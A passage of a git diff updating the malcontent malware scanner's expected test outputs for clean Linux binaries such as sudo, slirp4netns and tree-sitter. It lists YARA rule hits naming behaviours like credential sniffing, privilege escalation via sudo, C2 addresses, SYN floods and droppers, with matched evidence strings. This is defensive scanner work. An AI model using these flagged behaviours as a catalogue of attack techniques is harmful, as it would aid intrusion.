[process.versions](https://github.com/search?q=process.versions&type=code) | | MEDIUM | [discover/system/sysinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/sysinfo.yara#sysinfo) | [get system information (load, swap)](https://man7.org/linux/man-pages/man2/sysinfo.2.html) | [sysinfo](https://github.com/search?q=sysinfo&type=code) | | MEDIUM | [discover/user/info](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/userinfo.yara#userinfo) | returns user info for the current process | [os.homedir](https://github.com/search?q=os.homedir&type=code) | @@ -85,8 +87,6 @@ | MEDIUM | [net/webrtc](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/webrtc.yara#webrtc_peer) | makes outgoing WebRTC connections | [RTCPeerConnection](https://github.com/search?q=RTCPeerConnection&type=code) | | MEDIUM | [os/kernel/opencl](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/opencl.yara#OpenCL) | support for OpenCL | [OpenCL](https://github.com/search?q=OpenCL&type=code) | | MEDIUM | [privesc/sudo](https://github.com/chainguard-dev/malcontent/blob/main/rules/privesc/sudo.yara#sudo) | calls sudo | [sudo chmod 1777 /dev/shm](https://github.com/search?q=sudo+chmod+1777+%2Fdev%2Fshm&type=code) | -| MEDIUM | [process/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-get.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) | -| MEDIUM | [process/thread_local_storage](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/thread_local_storage.yara#tls_get_addr) | [looks up memory addresses for thread local storage or linked libraries](https://chao-tic.github.io/blog/2018/12/25/tls) | [__tls_get_addr](https://github.com/search?q=__tls_get_addr&type=code) | | MEDIUM | [sus/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations) | gets very excited | [!!!!!!!!!!!!!!!!](https://github.com/search?q=%21%21%21%21%21%21%21%21%21%21%21%21%21%21%21%21&type=code)
[0 !!!](https://github.com/search?q=0+++++%21%21%21&type=code)
[11366 !!](https://github.com/search?q=11366++++++%21%21&type=code)
[12366 !!](https://github.com/search?q=12366+++++%21%21&type=code)
[AAHHKKO !!](https://github.com/search?q=AAHHKKO+++%21%21&type=code)
[ABHH !!](https://github.com/search?q=ABHH+++++%21%21&type=code)
[ACHIJNPRU !!](https://github.com/search?q=ACHIJNPRU+++%21%21&type=code)
[Could not format log message !!](https://github.com/search?q=Could+not+format+log+message+%21%21&type=code)
[FFHHL !!](https://github.com/search?q=FFHHL+++%21%21&type=code)
[GG !!](https://github.com/search?q=GG++++%21%21&type=code)
[INVALID CONSTRUCTOR!!!](https://github.com/search?q=INVALID+CONSTRUCTOR%21%21%21&type=code)
[INVALID MAP!!!](https://github.com/search?q=INVALID+MAP%21%21%21&type=code)
[INVALID SHARED ON CONSTRUCTOR!!!](https://github.com/search?q=INVALID+SHARED+ON+CONSTRUCTOR%21%21%21&type=code)
[return !!](https://github.com/search?q=return+%21%21&type=code) | | MEDIUM | [sus/intercept](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/intercept.yara#interceptor) | References interception | [interceptBufferProtocol](https://github.com/search?q=interceptBufferProtocol&type=code)
[interceptFileProtocol](https://github.com/search?q=interceptFileProtocol&type=code)
[interceptHttpProtocol](https://github.com/search?q=interceptHttpProtocol&type=code)
[interceptProtocol](https://github.com/search?q=interceptProtocol&type=code)
[interceptResponse](https://github.com/search?q=interceptResponse&type=code)
[interceptStreamProtocol](https://github.com/search?q=interceptStreamProtocol&type=code)
[interceptStringProtocol](https://github.com/search?q=interceptStringProtocol&type=code)
[intercepted](https://github.com/search?q=intercepted&type=code)
[intercepting](https://github.com/search?q=intercepting&type=code)
[interceptionId](https://github.com/search?q=interceptionId&type=code)
[interceptionStage](https://github.com/search?q=interceptionStage&type=code)
[interceptor_info_map](https://github.com/search?q=interceptor_info_map&type=code)
[interceptor_url_loader_throttle](https://github.com/search?q=interceptor_url_loader_throttle&type=code)
[interceptors](https://github.com/search?q=interceptors&type=code)
[intercepts](https://github.com/search?q=intercepts&type=code) | | MEDIUM | [sus/leetspeak](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/leetspeak.yara#one_three_three_seven) | References 1337 terminology' | [1337](https://github.com/search?q=1337&type=code) | @@ -107,6 +107,7 @@ | LOW | [data/hash/sha1](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha1.yara#SHA1) | Uses the SHA1 signature format | [SHA1_](https://github.com/search?q=SHA1_&type=code) | | LOW | [data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [srand](https://github.com/search?q=srand&type=code) | | LOW | [discover/network/interface_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-get.yara#bsd_if) | get network interfaces by name or index | [if_indextoname](https://github.com/search?q=if_indextoname&type=code)
[if_nametoindex](https://github.com/search?q=if_nametoindex&type=code) | +| LOW | [discover/process/parent_pid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent_pid-get.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | | LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | | LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | @@ -175,6 +176,5 @@ | LOW | [process/groupid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setgid) | set real and effective group ID of process | [setgid](https://github.com/search?q=setgid&type=code) | | LOW | [process/groups_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) | | LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | -| LOW | [process/parent_pid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/parent_pid-get.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | | LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) | diff --git a/tests/linux/clean/slirp4netns.simple b/tests/linux/clean/slirp4netns.simple index 1129120a1..59973f623 100644 --- a/tests/linux/clean/slirp4netns.simple +++ b/tests/linux/clean/slirp4netns.simple @@ -9,6 +9,7 @@ credential/sniffer/bpf: medium discover/group/lookup: medium discover/network/interface_list: medium discover/network/mac_address: medium +discover/process/parent_pid_get: low discover/system/platform: low discover/system/sysinfo: medium discover/user/HOME: low @@ -102,7 +103,6 @@ process/groupid_set: low process/groups_set: low process/multithreaded: low process/namespace_set: low -process/parent_pid_get: low process/unshare: low process/userid_set: low sus/exclamation: medium diff --git a/tests/linux/clean/sonarlint-metadata.json.simple b/tests/linux/clean/sonarlint-metadata.json.simple index 309d055f6..1d4bcdb3f 100644 --- a/tests/linux/clean/sonarlint-metadata.json.simple +++ b/tests/linux/clean/sonarlint-metadata.json.simple @@ -37,7 +37,6 @@ impact/exploit: medium impact/infection/infected: medium impact/remote_access/agent: medium lateral/scan/brute_force: low -lateral/scan/tool: medium net/download: medium net/http/2: low net/http/cookies: medium diff --git a/tests/linux/clean/sudo.simple b/tests/linux/clean/sudo.simple index 5870618b0..3fa77a429 100644 --- a/tests/linux/clean/sudo.simple +++ b/tests/linux/clean/sudo.simple @@ -1,6 +1,7 @@ # linux/clean/sudo: medium credential/password: low discover/network/interface_list: medium +discover/process/parent_pid_get: low discover/system/cpu_info: low discover/system/hostname_get: low discover/user/HOME: low @@ -26,19 +27,17 @@ fs/path/usr_sbin: low fs/path/var: low fs/permission/chown: low fs/proc/arbitrary_pid: medium -fs/proc/pid_exe: medium fs/tempdir/tempfile_create: low -lateral/scan/tool: medium net/ip/string: medium net/socket/listen: medium net/socket/local_addr: low net/socket/receive: low net/socket/send: low os/kernel/seccomp: low +privesc/sudo: medium privesc/sudoers: low process/chroot: low process/groupid_set: low process/groups_set: low -process/parent_pid_get: low process/userid_set: low sus/intercept: medium diff --git a/tests/linux/clean/tracer.o.aarch64.simple b/tests/linux/clean/tracer.o.aarch64.simple index 79e3feebe..1864ab728 100644 --- a/tests/linux/clean/tracer.o.aarch64.simple +++ b/tests/linux/clean/tracer.o.aarch64.simple @@ -1,12 +1,10 @@ # linux/clean/tracer.o.aarch64: medium c2/addr/ip: medium collect/databases/mysql: medium -credential/sniffer/bpf: medium discover/network/netstat: medium evasion/bypass_security/linux/iptables: medium evasion/logging/acct: low impact/remote_access/heartbeat: medium -lateral/scan/tool: medium net/http/post: medium net/ip/multicast_send: low net/ip/syncookie: medium @@ -14,3 +12,4 @@ net/socket/listen: medium net/socket/receive: low net/socket/send: low net/tcp/synflood: medium +persist/kernel_module/symbol_lookup: low diff --git a/tests/linux/clean/tree-sitter.md b/tests/linux/clean/tree-sitter.md index 41eb959b5..f398b39de 100644 --- a/tests/linux/clean/tree-sitter.md +++ b/tests/linux/clean/tree-sitter.md @@ -1,47 +1,46 @@ ## linux/clean/tree-sitter [🛑 HIGH] -| RISK | KEY | DESCRIPTION | EVIDENCE | -|--------|---------------------------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| HIGH | [exec/shell/tmp_semicolon](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/tmp_semicolon.yara#semicolon_short_tmp) | unusual one-liners involving /tmp | [--;/tmp/rust-20241004-6494-uljaw4/rustc-1](https://github.com/search?q=--%3B%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1&type=code) | -| MEDIUM | [c2/tool_transfer/dropper](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/dropper.yara#dropper) | References 'dropper' | [Dropper](https://github.com/search?q=Dropper&type=code) | -| MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code) | -| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/clap/issues/home/linuxbrew/.cache](https://github.com/search?q=%2Fclap%2Fissues%2Fhome%2Flinuxbrew%2F.cache&type=code)
[/debug/.J](https://github.com/search?q=%2Fdebug%2F.J&type=code)
[/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | -| MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) | -| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execall) | executes external programs | [execvp](https://github.com/search?q=execvp&type=code) | -| MEDIUM | [exec/shell/power](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/powershell.yara#powershell) | powershell | [powershell](https://github.com/search?q=powershell&type=code) | -| MEDIUM | [fs/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path) | references path within /home | [/home/linuxbrew/.cache/Homebrew/cargo_cache/registry/src/index.crates.](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.cache%2FHomebrew%2Fcargo_cache%2Fregistry%2Fsrc%2Findex.crates.&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/tree-sitter/0.24.2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Ftree-sitter%2F0.24.2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/lib/ld.so](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Flib%2Fld.so&type=code)
[/home/linuxbrew/.linuxbrew/opt/gcc/lib/gcc/current](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgcc%2Flib%2Fgcc%2Fcurrent&type=code) | -| MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/col](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fcol&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/raw](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fraw&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/str](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fstr&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/syn](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fsyn&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/vec](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fvec&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/cell](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fcell&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/esca](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fesca&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/io/b](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fio%2Fb&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/num/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fnum%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/ops/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fops%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/slic](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fslic&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/str/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fstr%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/time](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Ftime&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/io/mo](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fio%2Fmo&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/io/st](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fio%2Fst&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/os/fd](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fos%2Ffd&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/sync/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fsync%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/sys/p](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fsys%2Fp&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/sys/s](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fsys%2Fs&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/threa](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fthrea&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/addr2line-0.22](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Faddr2line-0.22&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/gimli-0.29.0/s](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Fgimli-0.29.0%2Fs&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/hashbrown-0.14](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Fhashbrown-0.14&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/miniz_oxide-0.](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Fminiz_oxide-0.&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/rustc-demangle](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Frustc-demangle&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/cli/config/s](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fcli%2Fconfig%2Fs&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/cli/generate](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fcli%2Fgenerate&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/cli/src/high](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fcli%2Fsrc%2Fhigh&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/highlight/sr](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fhighlight%2Fsr&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/binding_](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fbinding_&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/././](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2F.%2F&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./ge](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fge&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./la](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fla&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./pa](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fpa&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./qu](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fqu&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./st](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fst&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./su](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fsu&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./tr](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Ftr&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/tags/src/lib](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Ftags%2Fsrc%2Flib&type=code) | -| MEDIUM | [fs/proc/self_exe](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/self-exe.yara#proc_self_exe) | gets executable associated to this process | [/proc/self/exe](https://github.com/search?q=%2Fproc%2Fself%2Fexe&type=code) | -| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | -| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [Content-Type](https://github.com/search?q=Content-Type&type=code)
[HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | -| MEDIUM | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen) | generic listen string | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| MEDIUM | [process/thread_local_storage](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/thread_local_storage.yara#tls_get_addr) | [looks up memory addresses for thread local storage or linked libraries](https://chao-tic.github.io/blog/2018/12/25/tls) | [__tls_get_addr](https://github.com/search?q=__tls_get_addr&type=code) | -| MEDIUM | [sus/leetspeak](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/leetspeak.yara#one_three_three_seven) | References 1337 terminology' | [1337](https://github.com/search?q=1337&type=code) | -| LOW | [data/encoding/json_encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/json-encode.yara#JSONEncode) | encodes JSON | [JSON.stringify](https://github.com/search?q=JSON.stringify&type=code) | -| LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | -| LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | -| LOW | [exec/dylib/iterate](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/iterate.yara#dl_iterate_phdr) | [iterate over list of shared objects](https://man7.org/linux/man-pages/man3/dl_iterate_phdr.3.html) | [dl_iterate_phdr](https://github.com/search?q=dl_iterate_phdr&type=code) | -| LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) | -| LOW | [exec/shell/SHELL](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/SHELL.yara#SHELL) | [path to active shell](https://man.openbsd.org/login.1#ENVIRONMENT) | [SHELL](https://github.com/search?q=SHELL&type=code) | -| LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | -| LOW | [fs/directory/list](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-list.yara#GoReadDir) | Uses Go functions to list a directory | [.ReadDir](https://github.com/search?q=.ReadDir&type=code) | -| LOW | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete.yara#unlink) | [deletes files](https://man7.org/linux/man-pages/man2/unlink.2.html) | [unlinkat](https://github.com/search?q=unlinkat&type=code) | -| LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | 